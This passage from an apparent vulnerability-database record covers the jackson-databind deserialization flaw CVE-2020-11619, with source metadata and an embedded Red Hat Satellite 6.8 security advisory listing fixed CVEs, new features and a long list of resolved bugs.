"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3805"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3805"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164215"
},
{
"db": "VULMON",
"id": "CVE-2020-11619"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "157834"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158095"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
},
{
"db": "NVD",
"id": "CVE-2020-11619"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-164215",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11619",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157834",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158095",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11619",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-07T00:00:00",
"db": "VULHUB",
"id": "VHN-164215",
"ident": null
},
{
"date": "2020-04-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11619",
"ident": null
},
{
"date": "2020-10-27T16:58:42",
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"date": "2020-12-17T18:09:37",
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-05-26T20:50:36",
"db": "PACKETSTORM",
"id": "157834",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-06-16T00:54:44",
"db": "PACKETSTORM",
"id": "158095",
"ident": null
},
{
"date": "2020-04-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-387",
"ident": null
},
{
"date": "2020-05-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004011",
"ident": null
},
{
"date": "2020-04-07T23:15:12.077000",
"db": "NVD",
"id": "CVE-2020-11619",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-02-22T00:00:00",
"db": "VULHUB",
"id": "VHN-164215",
"ident": null
},
{
"date": "2021-02-22T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11619",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-387",
"ident": null
},
{
"date": "2020-05-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004011",
"ident": null
},
{
"date": "2024-11-21T04:58:15.730000",
"db": "NVD",
"id": "CVE-2020-11619",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Unreliable data deserialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
}
],
"trust": 0.6
}
}
VAR-202003-1776
Vulnerability from variot - Updated: 2026-03-09 21:41FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane. FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A code issue vulnerability exists in javax.swing.JEditorPane in versions 2.x prior to FasterXML jackson-databind 2.9.10.4. A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Description:
Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Satellite 6.8 release Advisory ID: RHSA-2020:4366-01 Product: Red Hat Satellite 6 Advisory URL: https://access.redhat.com/errata/RHSA-2020:4366 Issue date: 2020-10-27 CVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781 CVE-2019-16782 CVE-2020-5216 CVE-2020-5217 CVE-2020-5267 CVE-2020-7238 CVE-2020-7663 CVE-2020-7942 CVE-2020-7943 CVE-2020-8161 CVE-2020-8184 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10693 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195 CVE-2020-14334 CVE-2020-14380 ==================================================================== 1. Summary:
An update is now available for Red Hat Satellite 6.8 for RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Satellite 6.7 - noarch, x86_64 Red Hat Satellite Capsule 6.8 - noarch, x86_64
- Description:
Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool.
Security Fix(es):
- mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
- netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
- rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7663)
- puppet: puppet server and puppetDB may leak sensitive information via metrics API (CVE-2020-7943)
- jackson-databind: multiple serialization gadgets (CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)
- foreman: unauthorized cache read on RPM-based installations through local user (CVE-2020-14334)
- Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover (CVE-2020-14380)
- Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS (CVE-2019-12781)
- rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)
- rubygem-secure_headers: limited header injection when using dynamic overrides with user input (CVE-2020-5216)
- rubygem-secure_headers: directive injection when using dynamic overrides with user input (CVE-2020-5217)
- rubygem-actionview: views that use the
jorescape_javascriptmethods are susceptible to XSS attacks (CVE-2020-5267) - puppet: Arbitrary catalog retrieval (CVE-2020-7942)
- rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)
- rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names (CVE-2020-8184)
- hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
- puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL (CVE-2018-11751)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
-
Provides the Satellite Ansible Modules that allow for full automation of your Satellite configuration and deployment.
-
Adds ability to install Satellite and Capsules and manage hosts in a IPv6 network environment
-
Ansible based Capsule Upgrade automation: Ability to centrally upgrade all of your Capsule servers with a single job execution.
-
Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest version of Puppet
-
Support for HTTP UEFI provisioning
-
Support for CAC card authentication with Keycloak integration
-
Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8 using the LEAPP based tooling.
-
Support for Red Hat Enterprise Linux Traces integration
-
satellite-maintain & foreman-maintain are now self updating
-
Notifications in the UI to warn users when subscriptions are expiring.
The items above are not a complete list of changes. This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1160344 - [RFE] Satellite support for cname as alternate cname for satellite server
1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems
1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy
1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt
1398317 - For the vms built by Satellite 6 using "Network Based" installation mode on VMWare, unable to change the boot sequence via BIOS
1410616 - [RFE] Prominent notification of expiring subscriptions.
1410916 - Should only be able to add repositories you have access to
1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3
1461781 - [RFE]A button should be available in the GUI to clear the recurring logics.
1469267 - need updated rubygem-rake
1486446 - Content view versions list has slow query for package count
1486696 - 'hammer host update' removes existing host parameters
1494180 - Sorting by network address for subnet doesn't work properly
1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost
1503037 - [RFE] Cancelled future/recurring job invocations should not get the status "failed" but rather "cancelled"
1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for "172.17.0.101"
1531674 - Operating System Templates are ordered inconsistently in UI.
1537320 - [RFE] Support for Capsules at 1 version lower than Satellite
1543316 - Satellite 6.2 Upgrade Fails with error "rake aborted! NoMethodError: undefined method first' for nil:NilClass" when there are custom bookmarks created
1563270 - Sync status information is lost after cleaning up old tasks related to sync.
1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers ('ECDHE-RSA-AES128-GCM-SHA256', 'ECDHE-RSA-AES256-GCM-SHA384')
1571907 - Passenger threads throwing tracebacks on API jobs after spawning
1576859 - [RFE] Implement automatic assigning subnets through data provided by facter
1584184 - [RFE] The locked template is getting overridden by default
1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box
1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template
1608001 - Rearrange search/filter options on Red Hat Repositories page.
1613391 - race condition on removing multiple organizations simultaneously
1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot
1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version
1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui
1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization
1625258 - Having empty "Allocation (GB)" when creating a new Host, nil:NilClass returned on creating the Host
1627066 - Unable to revert to the original version of the provisioning template
1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules
1630536 - yum repos password stored as cleartext
1632577 - Audit log show 'missing' for adding/removing repository to a CV
1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)
1645062 - host_collection controller responds with 200 instead of 201 to a POST request
1645749 - repositories controller responds with 200 instead of 201 to a POST request
1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build
1647364 - [RFE] Extend the audits by the http request id
1647781 - Audits contain no data (Added foo to Missing(ID: x))
1651297 - Very slow query when using facts on user roles as filters
1653217 - [RFE] More evocative name for Play Ansible Roles option?
1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks
1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,
1659418 - katello-tracer-upload failing with error "ImportError: No module named katello"
1665277 - subscription manager register activation key with special character failed
1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal
1666693 - Command "hammer subscription list" is not correctly showing the comment "Guests of " in the "Type" field in the output.
1677907 - Ansible API endpoints return 404
1680157 - [RFE] Puppet 'package' provider type does not support selecting modularity streams
1680458 - Locked Report Templates are getting removed.
1680567 - Reporting Engine API to list report template per organization/location returns 404 error
1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite
1685949 - [RFE] Support passing of attribute name instead of Id's in RHV workflow
1687116 - kernel version checks should not use /lib/modules to determine running version
1688886 - subscription-manager not attaching the right quantity per the cpu core
1691416 - Delays when many clients upload tracer data simultaneously
1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself
1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don't match runtime permissions
1705097 - An empty report file doesn't show any headers
1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service
1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed
1710511 - Filter by os_minor includes unexpected values on the Satellite web UI.
1715999 - Use Infoblox API for DNS conflict check and not system resolver
1716423 - Nonexistent quota can be set
1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page
1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array
1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally
1719509 - [RFE] "hammer host list" including erratas information
1719516 - [RFE] "hammer host-collection hosts" including erratas information
1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition
1721419 - SSH key cannot be added when FIPS enabled
1722954 - Slow performance when running "hammer host list" with a high number of Content Hosts (15k+ for example)
1723313 - foreman_tasks:cleanup description contain inconsistent information
1724494 - [Capsule][smart_proxy_dynflow_core] "PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start"
1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name
1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear
1730083 - [RFE] Add Jobs button to host detail page
1731155 - Cloud init template missing snippet compared to Kickstart default user data
1731229 - podman search against Red Hat Satellite 6 fails.
1731235 - [RFE] Create Report Template to list inactive hosts
1733241 - [RFE] hammer does not inherit parent location information
1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN
1736809 - undefined methodsplit' for nil:NilClass when viewing the host info with hammer
1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host.
1737564 - [RFE] Support custom images on Azure
1738548 - Parameter --openscap-proxy-id is missing in hammer host create command.
1740943 - Increasing Ansible verbosity level does not increase the verbosity of output
1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location.
1743776 - Error while deleting the content view version.
1745516 - Multiple duplicate index entries are present in candlepin database
1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI.
1749692 - Default Rhel8 scap content does not get populated on the Satellite
1749916 - [RFE] Satellite should support certificates with > 2048 Key size
1751981 - Parent object properties are not propagated to Child objects in Location and Host Group
1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command
1753551 - Traces output from Satellite GUI has mismatches with client tracer output
1756991 - 2 inputs with same name -> uninitialized constant #::NonUniqueInputsError
1757317 - [RFE] Dynflow workers extraction
1757394 - [BUG] Non-admin users always get "Missing one of the required permissions" message while accessing their own table_preferences via Satellite 6 API
1759160 - Rake task for cleaning up DHCP records on proxy
1761872 - Disabled buttons are still working
1763178 - [RFE] Unnecessary call to userhelp and therefore log entries
1763816 - [RFE] Report which users access the API
1766613 - Fact search bar broken and resets to only searching hostname
1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting
1767497 - Compute Resource filter does not correctly allow Refresh Cache
1767635 - [RFE] Enable Organization and Location to be entered not just selected
1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer.
1770544 - Puppet run job notification do not populate "%{puppet_options}"' value
1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method []' for nil:NilClass
1771367 - undefined methodrequest_uri' when Openidc Provider Token Endpoint is none
1771428 - Openscap documentation link on Satellite 6 webui is broke
1771484 - Client side documentation links are not branded
1771693 - 'Deployed on' parameter is not listed in API output
1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order
1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again
1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt
1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare
1774710 - UI: When selecting the server type in ldap authentication, "attribute mappings" fields could be populated automatically
1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)
1778503 - Prepended text on OS name creation
1778681 - Some pages are missing title in html head
1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI.
1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly
1782352 - [RHEL 8.1 client] All packages are not getting updated after click on "Update All Packages"
1782426 - Viewing errata from a repository returns incorrect unfiltered results
1783568 - [RFE] - Bulk Tracer Remediation
1783882 - Ldap refresh failed with "Validation failed: Adding would cause a cycle!"
1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log
1784341 - disable CertificateRevocationListTask job in candlepin.conf by default
1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file
1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6.
1785624 - [UI] Importing templates with associate 'never' is not resulting as expected
1785683 - Does not load datacenter when multiple compute resources are created for same VCenter
1785902 - Ansible RunHostJob tasks failed with "Failed to initialize: NoMethodError - undefined method []' for nil:NilClass"
1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date
1787329 - change filename in initrd live CPIO archive to fdi.iso
1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
1788958 - [RFE] add "elapsed time" column to export and hammer, make it filterable in WebUI
1789006 - Smart proxy dynflow core listens on 0.0.0.0
1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id
1789434 - Template editor not always allows refreshing of the preview pane
1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely
1789686 - Non-admin user with enough permissions can't generate report of applicable errata
1789815 - The "start" parameter should be mentioned inside "--compute-attributes:" in hammer_cli for Satellite 6
1789911 - "foreman-rake katello:publish_unpublished_repositories" is referring to column which no longer exists in katello_repositories table.
1789924 - [RFE] As user I want to see a "disabled" status for Simple Content Access (Golden Ticketed) Orgs
1791654 - drop config_templates api endpoints and parameters
1791656 - drop deprecated host status endpoint
1791658 - drop reports api endpoint
1791659 - Removeuse_puppet_defaultapi params
1791663 - remove deprecated permissions api parameters
1791665 - drop deprecated compute resource uuid parameter
1792131 - [UI] Could not specify organization/location for users that come from keycloak
1792135 - Not able to login again if session expired from keycloak
1792174 - [RFE] Subscription report template
1792304 - When generating custom report, leave output format field empty
1792378 - [RFE] Long role names are cut off in the roles UI
1793951 - [RFE] Display request UUID on audits page
1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists
1794346 - Change the label for the flashing eye icon during user impersonation
1794641 - Sync status page's content are not being displayed properly.
1795809 - HTML tags visible on paused task page
1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled
1796205 - iso upload: correctly check if upload directory exists
1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling
1796259 - loading subscriptions page is very slow
1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode
1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout
1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server
1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state.
1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host
1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input
1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input
1802529 - Repository sync in tasks page shows percentage in 17 decimal points
1802631 - Importing Ansible variables yields NoMethodError: undefined methodmap' for nil:NilClass (initialize_variables) [variables_importer.rb]
1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none
1804496 - While performing bulk actions, unable to select all tasks under Monitor --> Tasks page.
1804651 - Missing information about "Create Capsule" via webUI
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7
1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error
1806842 - Disabling dynflow_enable_console from setting should hide "Dynflow console" in Tasks
1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method mtu'
1807042 - [RFE] Support additional disks for VM on Azure Compute Resource
1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics.
1807829 - Generated inventory file doesn't exist
1807946 - Multiple duplicate index entries are present in foreman database
1808843 - Satellite lists unrelated RHV storage domains using v4 API
1810250 - Unable to delete repository - Content with ID could not be found
1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd
1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection
1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic "errata" page instead
1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units
1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana's API specification
1812904 - 'Hypervisors' task fails with 'undefined method[]' for nil:NilClass' error
1813005 - Prevent --tuning option to be applied in Capsule servers
1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)
1814095 - Applicable errata not showing up for module stream errata
1815104 - Locked provisioning template should not be allowed to add audit comment
1815135 - hammer does not support description for custom repositories
1815146 - Backslash escapes when downloading a JSON-formatted report multiple times
1815608 - Content Hosts has Access to Content View from Different Organization
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1816699 - Satellite Receptor Installer role can miss accounts under certain conditions
1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval
1816853 - Report generated by Red Hat Inventory Uploads is empty.
1817215 - Admin must be able to provide all the client ids involved inside Satellite settings.
1817224 - Loading one org's content view when switching to a different org
1817481 - Plugin does not set page
1817728 - Default task polling is too frequent at scale
1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com.
1818062 - Deprecated message about katello agent being shown on content host registration page
1818816 - Web console should open in a new tab/window
1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider..RmiProvider
1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane
1820193 - Deleted Global Http Proxy is still being used during repository sync.
1820245 - reports in JSON format can't handle unicode characters
1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512
1821335 - Inventory plugin captures information for systems with any entitlement
1821457 - [RFE] Capsules shouldn't update hosts' "Registered through" facts on the Satellite server in a load-balanced configuration.
1821629 - Eager zero seems to do nothing
1821651 - Manifest import task progress remains at 0.
1821752 - New version of the plugin is available: 1.0.5
1822039 - Get HTTP error when deploying the virt-who configure plugin
1822560 - Unable to sync large openshift docker repos
1823905 - Update distributor version to sat-6.7
1823991 - [RFE] Add a more performant way to sort reports
1824183 - Virtual host get counted as physical hosts on cloud.redhat.com
1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes "Blank"
1825760 - schedule inventory plugin sync failed due to 'organization_id' typecasting issue.
1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy
1825978 - Manifest refresh failed with 'Katello::Errors::CandlepinError Invalid credentials.' error
1826298 - even when I cancel ReX job, remediation still shows it as running
1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images
1826515 - [RFE] Consume Candlepin events via STOMP
1826625 - Improve performance of externalNodes
1826678 - New version of the plugin is available: 2.0.6
1826734 - Tasks uses wrong controller name for bookmarks
1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories
1827583 - Installing dhcp_isc and dhcp_remote_isc fails with "You cannot specify the same gem twice with different version requirements.....You specified: rsec (< 1) and rsec (>= 0)"
1828257 - Receptor init file missing [Install] section, receptor service won't run after restart
1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API
1828549 - Manifest Certificate Exposed by Unprivileged User
1828682 - Create compute resource shows console error 'Cannot read property 'aDataSort' of undefined'
1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default
1828868 - Add keep alive option in Receptor node
1829487 - Ansible verbosity level does not work
1829766 - undefined method tr' for nil:NilClass when trying to get a new DHCP lease from infoblox
1830253 - Default job templates are not locked
1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time
1830834 - Unable to update default value of a smart class parameter (Sql query error).
1830860 - Refactor loading regions based on subscription dynamically
1830882 - Red Hat Satellite brand icon is missing
1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo
1831528 - CVE-2020-5267 rubygem-actionview: views that use thejorescape_javascriptmethods are susceptible to XSS attacks
1833031 - Improve RH account ID fetching in cloud connector playbook
1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)
1833039 - Introduce error code to playbook_run_finished response type
1833311 - "Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid" while creating scap policy with ansible deployment option.
1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of '/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud' returned 1: Error: Nothing to do
1834377 - Disable mongo FTDC
1834866 - Missing macro for "registered_at" host subscription facet
1834898 - Login Page background got centralized and cropped
1835189 - Missing macro for "host_redhat_subscriptions" in host subscription facet
1835241 - Some applicability of the consumers are not recalculated after syncing a repository
1835882 - While executing "Configure Cloud Connector" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting
1836155 - Support follow on rails, travis and i18n work for AzureRm plugin
1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman.
1836774 - Some foreman services failed to start (pulp_streamer)
1836845 - "Generate at" in report template should be current date
1837951 - "invalid Unicode Property \p: /\b\perform various actions through those proxies\b(?!-)/" warning messages appears in dynflow-sidekiq@worker-hosts-queue
1838160 - 'Registered hosts' report does not list kernel release for rhsm clients
1838191 - Arrow position is on left rather in the middle under "Start Time"
1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory
1838917 - Repositories are not showing their available Release versions due to a low default db pool size
1838963 - Hypervisors from Satellite, never makes their way to HBI
1838965 - Product name link is not working on the activation keys "Repository Sets" tab.
1839025 - Configure Cloud Connector relies on information which is no longer provided by the API
1839649 - satellite-installer --reset returns a traceback
1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds
1839779 - undefined local variable or methodimplicit_order_column' for # on GET request to /discovery_rules endpoint
1839966 - New version of the plugin is available: 2.0.7
1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out .
1840191 - Validate parameters passed by receptor to the receptor-satellite plugin
1840218 - ArgumentError: wrong number of arguments
1840525 - Content host list doesn't update after the successful deletion of content host.
1840635 - Proxy has failed to load one or more features (Realm)
1840723 - Selected scenario is DISABLED, can not continue
1840745 - Satellite installation failed with puppet error " No Puppet module parser is installed"
1841098 - Failed to resolve package dependency while doing satellite upgrade.
1841143 - Known hosts key removal may fail hard, preventing host from being provisioned
1841573 - Clicking breadcrumb "Auth Source Ldaps" on Create LDAP Auth Source results in "The page you were looking for doesn't exist."
1841818 - icons missing on /pub download page
1842900 - ERROR! the role 'satellite-receptor' was not found in ...
1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/
1843406 - In 6.8, Receptor installation playbook's inputs are visible again
1843561 - Report templates duplicated
1843846 - Host - Registered Content Hosts report: "Safemode doesn't allow to access 'report_hraders' on #"
1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8
1843926 - satellite-change-hostname fails when running nsupdate
1844142 - [RFE] Drop a subsription-manager fact with the satellite version
1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP
1845486 - [RFE] Able to select 'HTTP Proxy' during Compute Resource create for 'GCE' as similar to EC2
1845860 - hammer org add-provisioning-template command returns Error: undefined method []' for nil:NilClass
1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1846254 - need to restart services after enabling leapp plugin
1846313 - Add index on locks for resource type and task id
1846317 - undefined methodklass' for nil:NilClass
1846421 - build pxe default do not work when more than 1 provider
